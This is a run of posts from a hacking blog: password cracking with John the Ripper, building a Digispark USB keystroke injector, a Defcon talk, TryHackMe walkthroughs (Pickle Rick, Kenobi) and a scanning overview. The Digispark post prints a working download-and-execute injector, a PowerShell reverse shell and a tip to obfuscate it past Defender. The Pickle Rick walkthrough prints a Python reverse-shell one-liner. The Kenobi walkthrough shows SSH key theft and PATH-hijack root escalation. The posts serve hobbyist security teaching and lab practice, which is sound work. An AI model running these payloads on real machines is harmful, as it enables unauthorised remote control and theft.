Hacking Tools: John The Ripper

Hello World and welcome to HaXez, the game’s afoot and in this post, I’m going to be talking about my favorite password-cracking tool, John The Ripper. John the Ripper is a multi-platform password cracking tool that can crack various password hashes. It was developed by OpenWall and was initially released in 1996. I believe John The Ripper got its name from another hacking tool called Jack The Cracker, or Cracker Jack. Anyway, you’re not here to read a reworded Wikipedia article.

Installing John The Ripper

John The Ripper should come preinstalled on most penetration testing Linux distributions. However, your package manager may have it if your distribution didn’t come with it preinstalled. For Debian-based distributions you can run:

sudo apt-get install john
Installing John The Ripper
Installing John The Ripper

If your package manager’s repositories don’t have John then you can install it from GitHub by using Git Clone. Then once it’s installed you can view the documentation by either running john -h or by looking at the man pages.

John The Ripper Features

As mentioned, John can crack a variety of different password hashes. You can see exactly which hashes he can crack by running the list formats command. This command is also helpful when trying to manually specify a hash type. If you’re in an exam and have forgotten how to ask John to crack a raw MD5 hash, then this command could help.

sudo john --list=formats
John The Ripper List Formats
John The Ripper List Formats

The functionality doesn’t end with mere password cracking though. John has a variety of tools to aid you in the heinous slaughtering of innocent password hashes. These additional tools can normally be found in your /usr/bin or /opt/john/src/ directories. Furthermore, these tools can be used for things like extracting hashes from password-protected ZIP or RAR archives.

Additional John Tools
Additional John Tools

John The Ripper Cracking Modes

John has a number of different password hash cracking modes. These various modes can be used to crack password hashes in different ways. If one method of cracking a password hash didn’t work, then you could try a different mode.

Wordlist Mode

By far the most common mode I’ve used is the wordlist mode. This mode requires the user to specify a wordlist. This wordlist could be bespoke and created by tools like Crunch. Or it could be one of the many wordlists available on the internet. John will then go through the list line by line attempting to match the hash to the word. This mode also offers a mangle option where it will apply rules to the word. In short, the word password could be automatically mangled to something like [email protected]

Single Crack Mode

As stated on the Openwall (John Developers) website, the single crack mode is the cracking mode you should start with. It will use login names, full names, and user home directory names as candidate passwords. It will then apply a large set of mangling rules. Successfully cracked passwords will also be tried against any other hashes that have been loaded. In theory, this mode should be able to crack a list of password hashes faster than if you were to supply the hashes separately.

Incremental Mode

This mode will try all possible character combinations. This is a powerful mode but would likely take longer than using a wordlist. If it tries all possible character combinations then it would eventually guess the correct password. If you know the length of the password then you can specify it to make cracking quicker. However, if you don’t know the length of the password and the password is a fairly long and complex one, then you could be waiting a while… like forever.

External Mode

From what I’ve read and what I understand, I believe this mode requires you to create your own cracking mode. The program code is a subset of C and would be compiled by John at startup. This could be useful if the hashing algorithm used to create the hash is bespoke. You could then write your own cracking module and load it into john to crack those custom-created hashes.

Identifying Hashes

John The Ripper will automatically attempt to identify the hashes that you give him. However, this can be prone to error. Fortunately, there are plenty of tools out there that you can use to identify password hash types. One such tool is hash-identifier which will come preinstalled or should be installable via your package manager or via cloning it from GitHub. To run the tool you simply type the name and then it will ask you to submit your hash. It will then spit out a list of hash types in the order of likelihood. Then you can use that information to manually tell John what type of hash you want to crack.

Hash Identifier
Hash Identifier

Getting Wordlists

A question I get asked a lot is where I get my word list from. Well, there are many locations. Most penetration distributions come with a wordlist preinstalled. However, you can download them from the internet. One particular wordlist that I would like to shine a light on is seclists. Seclists is available from GitHub and has almost every type of wordlist you could ever want. For the purposes of this demonstration, I will be using the rockyou.txt wordlist from the rockyou.com data breach.

Seclists
Seclists

Cracking MD5 Hashes With John The Ripper

As mentioned earlier, John can crack a variety of password hashes. The example below shows how you can crack an MD5 hash. An MD5 Hash or MD5 message-digest algorithm is cryptographically broken but still commonly use having a function that produces a 128-bit hash value. MD5 was originally designed by Ronal Rivest in 1991 as a method of replacing MD4 hashes. I used the following syntax to crack the MD5 hash.

sudo john --format=raw-md5 --wordlist=rockyou.txt hash1.txt
John The Ripper Crack MD5 Hash
John The Ripper Crack MD5 Hash

Cracking SHA1 Hashes With John The Ripper

The next hash that somehow managed to sneak its way into my directory is a SHA1 hash. SHA1 is a cryptographically broken encryption cipher that was originally designed by the National Security Agency. It was initially released in 1993 and produces a 160-bit hash. The following syntax shows how you can crack a SHA1 hash.

sudo john --format=raw-sha1 --wordlist=rockyou.txt hash2.txt
Cracking SHA1 Hashes With John The Ripper
Cracking SHA1 Hashes With John The Ripper

Cracking SHA256 Hashes With John The Ripper

Where did this hash come from? never mind, I’m sure our friend John can dispatch it fairly quickly. SHA256 is another cryptographically broken hashing algorithm that was developed by the National Security Agency (it’s almost as if they were designing them to fail).

sudo john --format=raw-sha256 --wordlist=rockyou.txt hash4.txt
Cracking SHA256 Hashes With John The Ripper
Cracking SHA256 Hashes With John The Ripper

Cracking Whirlpool Hashes With John The Ripper

What’s that? no secret is safe? Well if you use a crappy password and someone is able to obtain your password hash then you aren’t far from the truth. have you considered doing a password audit of your employee’s passwords to ensure they are secure? Maybe now is a good time. The syntax below shows how you can crack Whirlpool hashes. Whirlpool is a broken cryptographic algorithm designed by Vincent Rijmen and was first published in 2000.

sudo john --format=whirlpool --wordlist=rockyou.txt hash4.txt
Cracking Whirlpool Hashes With John The Ripper
Cracking Whirlpool Hashes With John The Ripper

Cracking MD4 Hashes With John The Ripper

MD4 hashes are outdated but you would be surprised to see how many organizations still use broken and outdated cryptographic algorithms. MD4 is a cryptographically broken encryption cipher originally developed by Ronal Rivest and first published in 1990. The syntax below shows you how to crack passwords encrypted with MD4 hashing algorithms.

sudo john --format=raw-md4 --wordlist=rockyou.txt hash5.txt
Cracking MD4 Hashes With John The Ripper
Cracking MD4 Hashes With John The Ripper

John.pot

Did I just rickroll you via password hashes? well yeah, I did and I refused to apologize. This post took me a day to write up and unfortunately you have to deal with the consequences. So, what happens to all the password hashes that get cracked by john? Well, they get stored in a file called john.pot. You can use locate on your system to find this but it is usually located in /root/.john/john.pot. If you’re trying to crack a hash but are getting an error message then it is likely you have already cracked it. Deleted the john.pot file or remove the line with the cracked has in order to re-crack the file.

sudo cat /root/.john/john.pot
John.pot
John.pot

Conclusions

John The Ripper is a fantastic tool that is near and dear to my heart. Yes, there are alternatives such as Hashcat but this is a mainstay of cybersecurity. It does what it needs to do and provides a simple way of doing it. It is one of my favorite tools for hacking and I will continue using it until it is no longer feasible to do so. I realize I have only scraped the surface on the functionality of John The Ripper but this post isn’t meant for advanced usage, it is merely a guide on how to get started with John The Ripper. So get slaying and let me know how you get on.

Hack Any Computer In 2 Seconds With This £2 Device | Digispark

Hello World and welcome to HaXeZ. In this post, I will be discussing the Digispark. With the right payload, the Digispark can hack any computer in 2 seconds. I realize that’s a bold claim to make and is definitely a clickbait title but it isn’t far from the truth. The Digispark, like the Hak5 USB Rubber Ducky, is a keyboard emulator that can inject keystrokes on the target computer at breakneck speeds. Therefore, anything a hacker can do on a keyboard, the Digispark can do too but arguably faster. So, If you’re having trouble getting hold of a Hak5 USB Rubber Ducky then this could be the device for you. For about £2 and a bit of time, you can build your own Rubber Ducky from a Digispark. I’ve written another article using a different board, feel free to check that one out here.

Arduino Integrated Development Environment

The first step in creating your very own DIY USB Rubber Ducky super hacking tool is to download the Arduino Integrated Development Environment. This can be downloaded from the following URL https://www.arduino.cc/en/software. Simply visit the URL, click the download link, double-click the downloaded file and then follow the installation wizard.

Arduino Integrated Development Environment
Arduino Integrated Development Environment

Configuring Arduino IDE

Once you have installed the Arduino IDE, you need to configure it so that it can write your payloads to the Digispark. In order to do this, first launch the Arduino IDE then head to File, then Preferences, then paste the following URL into the Additional Boards Manager URLs input box. This allows the Arduino IDE to work with third-party boards such as the Digispark.

http://digistump.com/package_digistump_index.json

Digispark Additional Boards Manager URLS
Digispark Additional Boards Manager URLS

Install Digispark AVR Boards

Next, you need to install the Digistump Digispark boards so that the Arduino IDE knows how to talk to your board. To do this, head to Tools, Board and click Boards Manager. Then from the drop-down menu select contributed and search for the Digistump AVR Boards. There should be an install button, click that and wait for the boards to finish installing.

Arduino Boards Manager
Arduino Boards Manager

Digispark Drivers

That should be everything you need. However, if Windows is having trouble recognizing your board then you may need to install the drivers manually. You can find these by performing a quick Google search for “Digispark Arduino Drivers”. This should take you to the following GitHub page which has a download link labeled Digistump.Drivers.zip. Download, extract and install these drivers.

https://github.com/digistump/DigistumpArduino/releases 
Digispark Drivers
Digispark Drivers

Digispark Payloads

Now that you’re Arduino IDE is set up and the drivers are installed, it’s time to find some payloads. There are tons of payloads available on the internet that do various things. These payloads range from performing a fake Windows update while playing Never Gonna Give You Up by Rick Astley to launching a Fork Bomb on the target system. I hope it goes without saying that some of these payloads can be dangerous and you should exercise caution when playing with them. The following GitHub repository has some good payloads to practice with.

https://github.com/CedArctic/DigiSpark-Scripts
Digispark Payloads
Digispark Payloads

Reverse Shell Downloader Payload

The payload I’m going to be focusing on is the Powershell reverse shell payload. You can see from the script below that this is a fairly simple script. It starts by sending the Windows Key and R to the computer. This opens the Run dialog box. After a brief delay, it types out “powershell.exe” into the Run dialog box and then sends the Enter key. This spawns a new Powershell window. In the new Powershell Window, it types out a command to download another payload from a URL. After a brief delay, it then executes the payload.

// This script downloads and executes a powershell script efectively opening up a reverse shell in less than 3 seconds. 
// Credits to hak5 and samratashok (developer of the nishang framework).

#include "DigiKeyboard.h"
void setup() {
}

void loop() {
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("powershell.exe");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("Invoke-WebRequest -Uri 'https://haxez.org/payload.ps1' -OutFile 'payload.ps1'");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("./payload.ps1");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  for (;;) {
    /*Stops the digispark from running the scipt again*/
  }
}

Powershell Reverse Shell Payload

Please note that the following Powershell script will probably be caught by Windows Defender. However, with some tinkering like renaming variables and obfuscating the code, it may not be detected. I won’t be attempting to do that in this walkthrough. The following script is a reverse shell that will attempt to connect back to the IP address and port that you specify. This script will need to be uploaded to a server that you control and then the location of the script needs to be added to the downloader payload above.

#A simple and small reverse shell by samratashok's Nishang framework. Change the Host IP Address and Port according to your setup as described in the README file of the script. 
$sm=(New-Object Net.Sockets.TCPClient("192.168.0.23",4243)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}

Writing Payloads To Digispark

Once you have your payloads ready, it’s time to write the downloader payload to the Digispark. It’s important that you don’t plug in the Digispark first. First, paste your code into the Arduino IDE and then click the upload button. This will then spawn a terminal at the bottom of the application prompting you to plugin the device. You should now be able to plug in your Digispark. Once the terminal reads 100%, the payload will automatically execute. Probably best if you don’t try to use any payload that can potentially damage your computer.

Upload Payload To Digispark
Upload Payload To Digispark

Digispark Demonstration

With the payload written to the Digispark, it’s time to test it out. Ensure that you have uploaded the reverse shell payload to your web server and that the path has been amended in your download payload. Then set up a net cat listener or some other listener on your attack machine (the machine you want to connect back to) and plug the Digispark into the target machine. As mentioned previously, this will only likely work with Defender disabled unless you have modified your payload. However, please see the video below of a demonstration.

PwnHub Digispark Demonstration

Conclusions

The Digispark is a fantastic affordable device that has a lot of flexibility. The price alone is enough to justify owning one and tinkering with it. Granted the introduction about it being able to hack a computer in 2 seconds is a bit of an exaggeration but I hope you can see the potential from the write-up. You can use it for automation rather than hacking. You can tell it to do anything a keyboard can do provided the payload fits on the 6000kb chip. I had a lot of fun with it and will be keeping a few preconfigured ones in my hack bag at all times… just in case. Anyway, check out the video below for a more hands-on demonstration.

My First Defcon Talk

Hello World and welcome to HaXeZ. This week has been interesting. Not only am I going to Bsides on Saturday but yesterday (Thursday), I performed my first Defcon talk at DC441242 and DC441452. I know it isn’t much to brag about but I consider it a personal achievement. I’m sure I’m not alone in saying that coming out of lockdown left me with a few social anxieties.

Having not been out socializing for a while, I’ve found myself avoiding social situations. Not so much because of the virus, but more because of wanting to stay within my comfort zone. That’s the problem with comfort zones, they are comfortable. However, staying in your comfort zone rarely allows you to achieve much.

Local Defcon
Local Defcon

Nerves at Defcon

I’ve always wanted to do a Defcon talk, it’s been on my bucket list for a while. However, the pandemic happened and meetings were postponed or done through Zoom. Given the number of video quizzes I did during the lockdown, I didn’t fancy it. I wanted to do it in person but with that comes nervousness. Despite how confident they are, anyone who has even performed public speaking before probably felt nervous. I remember giving the best man speech at my brother’s wedding and having my heart race the entire time. So why shouldn’t I throw myself to the wolves and deliver a cybersecurity talk to a room full of cybersecurity professionals?

With that said, I was surprised as I wasn’t feeling nervous at all. Sure, during the day leading up to the up to it I was, but being there and doing it, I was fine. I have been to a few of these events before so recognized a few people. I also asked a few of my friends to come (Thanks Jay, Mark, and Bob). During the presentation, there were moments where I fumbled my words or couldn’t explain things how I wanted to but I don’t think anyone noticed.

Anxiety at Defcon
Anxiety at Defcon

Imposter Syndrome

You know what I’m talking about. I’m sure others have it in different professions but I feel like it is prolific in the IT industry. I had it when I was doing tech support before I popped my first shell. I have it now even though I’ve been in IT for over a decade. It’s the feeling that you don’t belong somewhere, that you don’t fit in, that you’re faking it. That everyone else is a billion times smarter than you and will make fun of you for being a noob. Here’s the thing, everyone was once where you are today. Whether you’re at the beginning of your journey or have been doing it for years. Someone somewhere will know something you don’t. That’s ok, actually, that’s great, it means there is more to learn. Nobody knows everything (is that a double negative?).

The people at my local Defcon were great, they let me do my presentation and were an easy audience to talk to. They looked engaged the whole time and put me at ease. At the end of the presentation, they asked me a few questions about the techniques. To be honest with you, I didn’t know the answers to a lot of them. Again, that’s ok, it gives me something to go home and research. Some of the questions I felt I should have known but others I hadn’t even thought about. This is how we grow, we invite challenges into our lives and overcome them. We get feedback from other people and view things from different vantage points.

Imposter Syndrome
Imposter Syndrome

My Defcon Talk

I’m not sure if I will ever overcome imposter syndrome but honestly, I’m not sure I want to. I would rather feel like an imposter and push myself to learn something new every day than feel like I know everything and take my foot off the gas.

On to my talk, if you watch my Youtube videos then you may have seen one I did recently about DNS tunneling. It isn’t a revolutionary hacking technique, nor is it a new one. However, I thought it was cool. I presented it at a virtual work meeting on a Friday afternoon and people seemed to enjoy it so I thought why not take it a step further. Local Defcon groups are always looking for people who want to present and it just so happened that my local one had an opening. I spoke with the organizers and they were happy to have me.

The point I’m trying to make is, if you want to do something like this but are worried that people have heard it all before, don’t be. You will be presenting it from a different perspective and that could be the perspective that someone needs to understand something. Go for it.

Better Than Expected
Better Than Expected

Final Thoughts

So what’s next? well, I would like to do another talk in the future. I’m currently working on a video about the digi spark board. I’m going to be programming it to be a cheap alternative to the USB rubber ducky. I’ve written a similar post where I used a CJMCU but that was a bit more expensive and used a Micro SD card. Perhaps that is something I could talk about, or perhaps I could talk about the Flipper Zero when it arrives (oh yes! I ordered one).

Either way, I wouldn’t hate it if I became a regular talker. I feel like it is something I could do to give something back to my local community. It’s a great way to make connections and learn new things. If you’re into hacking or security in general, you should definitely check out your local Defcon if you have one. It could be the stepping stone you need to land your first Cybersecurity job or just a way to make new friends with similar interests. My local Defcon did a talk about lock-picking once and had a bunch of locks and lock-picking toys for everyone to play with. It was great.

Anyway, I’m now someone who has spoken at a local Defcon. Not going to lie, it feels good.

Thanks for reading.

I’M PICKLE RICK! wubba lubba dub dub | TryHackMe

Hello World and welcome to HaXeZ, in this post I’m going to be doing the Pickle Rick room on TryHackMe. This is a fun easy room that requires some basic enumeration and then web application exploitation via code execution.

PICKLE RICK!
PICKLE RICK!

Scanning Pickle Rick

Ok, so the first thing we need to do is scan the box. To do that we’re going to use our favorite tool Nmap. As seen below, I ran the Nmap scan with the “-sC” flag set for safe scripts. The “-sV” flag set for service versions and then I specified all ports with “-p0-” and then gave it the IP address. As you can see, the results of the Nmap scan show that there are only two ports listening. Port 22 for Secure Shell and port 80 for an Apache Web Server.

sudo nmap -sC -sV -p0- 10.10.118.227 -T4
Nmap Scan of Pickle Rick
Nmap Scan of Pickle Rick

Exploring The Web Server

As it was unlikely that the room creator wanted us to brute-force SSH, I headed over to the web server. Show Me What You Got!. Upon visiting the web server I was greeted with a Rick and Morty themed website. Furthermore, it looks as though Rick has left Morty a message asking him for help.

Pickle Rick Web Server
Pickle Rick Web Server

Additionally, viewing the page source of the application revealed the username of R1ckRul3s within an HTML comment. The page source also gave away the location of the assets folder. As can be seen, the CSS and Javascript files were being called from the assets directory.

Pickle Rick Page Source
Pickle Rick Page Source

Navigating to the assets directory didn’t reveal much more information. However, it did have directory listening enabled. If this was a web application security assessment, I would definitely report this. While the information contained in the directory doesn’t any sensitive information now. It could do in the future.

Web Server Directory Listing Enabled
Web Server Directory Listing Enabled

Pickle Rick Foothold

After a bit more poking around, I stumbled upon the robots.txt file. Normally these files are used to tell web servers not to index certain pages. However, this one appeared to contain the string “Wubbalubbadubdub”. At first, I thought it was nonsense, but it is not nonsense at all. In bird person’s native tongue it means “I am in great pain, please help me”. References aside, this is the password that goes with the “R1ckRul3s” username we found earlier.

Robots.txt Wubbalubbadubdub
Robots.txt Wubbalubbadubdub

I ran dirb with a custom wordlist against the web application and found a login.php page. Admittedly, I should have found this page without dirb. When doing web application assessments, it’s a good idea to look for login pages with the extension being used (PHP, ASP, ASPX).

Pickle Rick Login PORTAL ha
Pickle Rick Login PORTAL ha

Most of the pages were protected and could only be accessed by the Rickest Rick or something. However, I was able to access the commands page. This allowed me to run commands such as “ls” to see the contents of the current directory. It was there I discovered the first ingredient in a text file called “Sup3rS3cretP1ckl3Ingred.txt” or something. I wasn’t able to use “cat” on the file, likely due to command blacklisting. However, I could use “less” on the file which gave me the first ingredient.

Web Application Command Execution
Web Application Command Execution

Popping Shells

As we have now confirmed that command execution is possible. We should be able to get a reverse shell from the application back to our hacker machine. To do this I visited the PayloadsAllTheThings GitHub repository and stole a python one-liner.

GitHub PayloadsAllTheThings
GitHub PayloadsAllTheThings

Next, using NetCat I opened a portal to dimension 4242 (because of the meaning of life) on my attacker machine. This is the portal that our snake payload is going to come through once executed by the web application. I’m well aware that there are hundreds of better snake jazz jokes I could make here but cba.

sudo nc -lvnp 4242
NetCat Listener

Finally, I modified the snake one-liner to change it to python 3. I also change the localhost address to the address of my tun0 TryHackMe VPN IP address. I then copied the payload and pasted it into the command input box and hit the execute command.

python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
Web App Command Execution
Web App Command Execution

Pickle Rick Privilege Escalation

Sure enough, the portal to dimension 4242 was opened. The snake army commenced their invasion of the Pickle Rick web server. They slithered around for a bit and found that they had landed on the server as www-data. However, www-data had sudo privileges to do everything without a password. They used these privileges for their own nefarious purposes and elevated their privileges to root. From there they were able to capture the second ingredient found in the /home/rick directory. They then advanced to the /root directory where they were able to steal the third ingredient. It was only a matter of time before they turned Rick back into a human and took over the world.

Rooted
Rooted

Conclusions

This was a really fun box, I always try not to use words like really and very in my writing as they are unnecessary. However, this box was really fun. I probably enjoyed it more because I am a BIG (again unnecessary wordage) fan of Rick and Morty. I’m also a sucker for boxes with a strong theme as I love the added immersion that it adds. While this box was listed as easy, I do feel the privilege escalation could have been harder. Would have loved to have had to escalate to the Rick user first. And then to root by using a bespoke Rick and Morty themed science binary with unquoted binary paths or something. Perhaps the simplicity of it is what made me enjoy it more, who knows. Anyway, that’s all I have for you. Please check out the video to give me more views, and subscribe if you want.

Conclusions
Conclusions
Pickle Rick Video Walkthrough

Hack Like A Jedi | Kenobi | TryHackMe

Hello World and welcome to HaXeZ, in this post we’re going to be channeling our inner Jedi and taking on the TryHackMe Kenobi room. This room requires you to perform some enumeration to identify services. Then, you need to enumerate SAMBA, NFS, and FTP. Next, you need to exploit a vulnerability in FTP to steal Kenobi’s private key and SSH to the server. Once on the server as Kenobi, you can escalate your privileges to root via a SUID file that uses unquoted paths.  

Kenobi Enumeration

First, I ran a Nmap scan with the safe scripts, service version, and operating system detection flags set. This revealed that there were 7 ports listening on the host. As can be seen, the important services found were FTP, SSH, HTTP, NFS, and Samba.

sudo nmap -sC -sV -O 10.10.182.106 -T4
Kenobi Nmap Scan
Kenobi Nmap Scan

Kenobi SAMBA Enumeration

Once the Nmap scan was complete, I enumerated the SAMBA shares. There are several Nmap scripts that can enumerate Samba shares, as seen in the image below. In short, the scripts used were ‘smb-enum-shares’ and ‘smb-enum-users’. As can be seen, it was possible to identify a total of 3 shares on the host. Furthermore, the IPC$ and Anonymous shares had read and write access.

sudo nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.182.106
Kenobi SAMBA Enumeration
Kenobi SAMBA Enumeration

Accessing SAMBA Shares

Using a tool called smbclient, it was possible to access the SAMBA shares and view the files. As a result, the Anonymous share (mapped to C:\home\kenobi\share) had a file called log.txt. I downloaded that file using the get command and opened a new tab to read the contents. Notably, the log file mentioned an SSH key being generated as well as the ProftpD service running on port 21.

Kenobi Log.txt
Kenobi Log.txt

Kenobi NFS Enumeration

After reviewing the results of the Nmap scan from earlier, I noticed that NFS was open on ports 111 and 2049. NFS is short for Network File System and is another way to share directories and files on the network. With this in mind, I enumerated the NFS service using a number of Nmap scripts. As can be seen below, the NFS share was exposing the /var directory.

sudo nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.182.106
Kenobi NFS Enumeration
Kenobi NFS Enumeration

Finding Vulnerabilities With Searchsploit

It’s time to start looking for a way to gain access to the machine. From our Nmap scan, we know that we have access to the /var NFS share. We also know that FTP is running and that at some point an SSH key was created. I used Searchsploit to look for vulnerabilities in the ProFTPD 1.3.5 service. The results indicate that there is a command execution vulnerability in this version of ProFTPD.

sudo searchsploit ProFTPD 1.3.5
Searchsploit

Exploiting FTP

Ordinarily, FTP will only grant us access to the directories and files in the directory specified in the FTP configuration file. However, as this version of FTP is vulnerable and is running as the Kenobi user, we can leverage that. We can copy the SSH key mentioned in the log file, and move it to a directory that we can access such as the NFS share /var. To do this we use the ‘SITE CPFR’ and ‘SITE CPTO’ commands as shown below.

nc 10.10.182.106 21
SITE CPFR /home/kenobi/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa
Coping the Kenobi SSH Key
Coping the Kenobi SSH Key

Stealing The SSH Key From NFS

Now that the SSH key is on the /var NFS share, we can mount that share and steal the key. In order to do this, we’re going to use the mount command. First, we need to make a directory to mount the NFS share to. I created a directory in ‘/mnt’ called kenobi2. Next, I mounted the ‘/var’ directory to that newly created directory and stole the SSH key.

sudo mkdir /mnt/kenobi2
sudo mount 10.10.182.106:/var /mnt/kenobi2
sudo cp /mnt/kenobi2/tmp/id_rsa ~/id_rsa
Mounting NFS and Stealing The Key
Mounting NFS and Stealing The Key

Kenobi Foothold

Now that we have Kenobi’s SSH private key we should be able to access the machine. First we need to change the permissions on the key to 600 to please the SSH gods. Once that is done we can SSH to the box using the SSH key which will grant us our foothold into the machine.

SSH To Box
SSH To Box

System Enumeration

Before we elevate our privileges to root and own the entire system, we need to find a way to do so. One common method of privilege escalation on the Linux system is via programs with the sticky bit set. The sticky bit means that the program retains root privileges when run by a normal user. There is more to it but I won’t explain the details in this write-up. So, we need to find all the files with the sticky bit set. The screenshot below shows the results of a find command used to find sticky bits. Essentially, it is looking for all files where the permissions have the sticky bit and then sending errors to ‘/dev/null’.

find / -perm -u=s -type f 2>/dev/null
Finding Sticky Bits on Kenobi
Finding Sticky Bits on Kenobi
Sticky Bit On Menu
Sticky Bit On Menu

Poking The Program

If you run the same command on your local system, you will notice that the ‘/usr/bin/menu’ binary is uncommon. Running this binary shows us that the program is indeed a bespoke program and it gives us three options.

Running /usr/bin/menu Binary
Running /usr/bin/menu Binary

If we run strings against that binary, we can get an idea of what’s going on. Furthermore, we can see how the creator of this binary made a crucial mistake. We can see that the three options correspond to three system binaries (curl, uname, and ifconfig). Unfortunately for the creator, but fortunately for us, they forgot to include the full path to the binary. As this is running with the sticky bit set we can modify our ‘$PATH’ environmental variable and create our own malicious versions of these binaries.

Strings on /usr/bin/menu Binary

Kenobi Privilege Escalation

First, I changed my directory to ‘/tmp’. Then I echoed the contents of the ‘/bin/sh’ binary into a file called curl. This will be our replacement malicious binary. I then gave the newly created curl binary, read, write, and execute privileges. Finally, I exported the ‘/tmp’ path in to our ‘$PATH’ environmental variable. Now, when we run the ‘/usr/bin/menu’ binary, it will look for the binaries in the ‘/tmp’ path first. And what will it find? our malicious curl binary.

cd /tmp
echo /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH
Creating curl binary and change path
Creating curl binary and change path

Now, when we run the ‘/usr/bin/menu’ binary and select the status check options, it runs our malicious curl binary as root and spawns a shell with root privileges.

Unlimited Power
Unlimited Power

Conclusions

This box was a lot of fun, I’m sure there was more to it that I didn’t explore. For example, there was a web server that I didn’t even look at. With the finale of the Kenobi series being released, I thought there was no better time to do a walkthrough of this box. Try and cash in on those delicious keywords. There was nothing out of the ordinary on this box, very typical enumeration and exploitation but it was still a fun box. Anyway, I hope you enjoyed the write-up, feel free to watch the video below.

Hack To Learn: Vulnerability Scanning

Hello World and welcome to HaXeZ, today I’m going to be covering Vulnerability Scanning. This post is continuing the Hack To Learn series where I cover the basics of the different phases of hacking or penetration testing. So far we have covered Environment Setup, Hacking Legally, and Open Source Intelligence Gathering.

Vulnerability Scanning

Once you have completed the open source intelligence gathering phase, it’s time to start looking for vulnerabilities. Vulnerability scanning is the process of using tools to scan your target for vulnerabilities. There are many different tools that can perform vulnerability scans and the type of target you are scanning will determine what tools you use. For example, if you’re looking for vulnerabilities that affect services on the host then you could use Nmap, Nessus, OpenVAS, and many others. However, if you’re attacking a web application then you would likely use Nikto, Burp Suite, OWASP ZAP, or some other tool.

Nmap Vulnerability Scanning

If you haven’t seen my post on Nmap then I would recommend giving it a read. It covers Nmap in more detail than I intend to do here. With that said, Nmap is a fantastic vulnerability scanner. Early in my IT career, I had many misconceptions about Nmap. I thought it was merely a network scanner used to identify what hosts were online and what services were running. How naive, Nmap is a comprehensive network auditing tool that can identify and exploit vulnerabilities. I use it on almost every project I’m on. I highly recommend reading more about the different flags and scripts before recklessly running them like I’m about to do.

The image below shows the output of a Nmap scan configured to find vulnerabilities. You can see from the results that it has found some CVEs. I first specified the ‘-g’ flag to set the source port to 53. This is useful for firewall evasion as some firewalls may be configured to allow DNS traffic in from any source. I then specified the ‘-f’ flag to fragment the packets. This works by splitting the packets into multiples of 8 which can also be beneficial for firewall evasion. Then, I specified ‘-sV’ to get the service versions and ‘-p0-‘ for all ports. Next, I specified the ‘–script’ argument followed by various categories of scripts to execute. Finally, I added the IP address and the ‘-T5’ to speed it up.

This configuration is incredibly reckless and you should never use it against production environments. I’m merely using it to demonstrate the power of Nmap. Do NOT do this.

sudo nmap -g 53 -f -sV -p0- -O --script vuln,auth,exploit 10.0.2.5 -T5
Nmap Vulnerability Scanning
Nmap Vulnerability Scanning

Nessus Vulnerability Scanning

Where to start! Nessus from Tenable is a powerful multifunctional vulnerability scanning and auditing solution. It can be used to scan entire ranges of IP addresses or perform audits from uploaded configuration files. Whether you’re on team red or blue, chances are you’ve used it or at least heard of it. Nessus is likely going to be your tool of choice when performing vulnerability assessments or full-on penetration tests. I will probably create a separate article and video focusing on Nessus as part of the Hacker Tools series. All you need to know for the moment is that it is an effective vulnerability scanner. They offer an essential version for you to play around and I highly recommend giving it a go. However, the professional version has many more cool toys.

The image below is of an advanced scan that I performed against the Metasploitable 2 virtual machine. I configured it to scan all ports (0-65535) and turned off the Denial of Service plugin. Other than that I only changed the reporting to report as much as possible. As you can see it has found a bunch of issues (as expected).

Nessus Vulnerability Scanning
Nessus Vulnerability Scanning

Nikto Web Application Scanning

Nikto is a free CLI web application vulnerability scanner. It will search for interesting directories and files, analyze response headers, check for outdated software, and look for vulnerabilities. It’s a good place to start when performing web application security assessments. Granted, it won’t hack into the website for you, but it will give you a good idea of things to look at during the early stages of the assessment. Nikto can be intrusive and I have seen web applications suffer performance issues when scanning them. However, the hardware that those apps were hosted on wasn’t fit for purpose. I’ve also found that Nikto can be tricked by web application firewalls. It will report a 200 response for every directory that it brute forces, even though it doesn’t exist. Or it will misidentify a vulnerability or some other incorrect server-side configuration.

Nikto
Nikto

Burp Suite Web Application Scanning

No vulnerability scanning article would be complete without Burp Suite from Portswigger. This is the Bugatti Veyron of web application vulnerability scanners. Unfortunately, I only have the community version installed in my home lab but I use the pro version almost daily. The pro version has many more features that allow for automated scanning and vulnerability detection. You still need to manually go through and verify those findings but Burp takes out a lot of the guesswork. It also has an extensive list of additional plugins that you can install to increase the functionality. If you’re looking to get a job in cybersecurity then knowing how to use Burp Suite will probably improve your chances once it comes to that technical test.

Burp Suite
Burp Suite

Conclusions

I know I have only scraped the surface on the different vulnerability scanners that are available. However, to cover them all would take forever and I only wanted to cover the ones that you are likely to come across first. Granted there are some amazing alternatives out there. Where you have Nessus, you also have OpenVAS. Where you have Burp Suite, you also have OWASP Zap. I’m not saying that one is better than the other, I suppose that comes down to personal preference and these tools are my personal preference. I know a guy who almost refuses to touch anything that isn’t command line based. Archie, I salute you. Anyway, definitely give these tools a try against your own test virtual machines. They are a lot of fun.

Hacking Tools: Hydra

Hello World and welcome to HaXeZ, today we’re talking about the brute forcing tool THC Hydra. According to Wikipedia, Hydra is a parallelized network logon cracker. It is available on a number of Penetration Testing Linux distributions such as Kali Linux, Parrot OS, Black Arch, and BackBox. Hydra has the ability to perform attacks against various different network services including Remote Desktop, Secure Shell, and many others. It is also capable of performing brute force attacks against web applications.

Installing Hydra

Hydra tends to come preinstalled on most penetration testing distributions. However, it can also be installed using apt. If your repositories don’t have Hydra for whatever reason then it can easily be installed from GitHub using git clone.
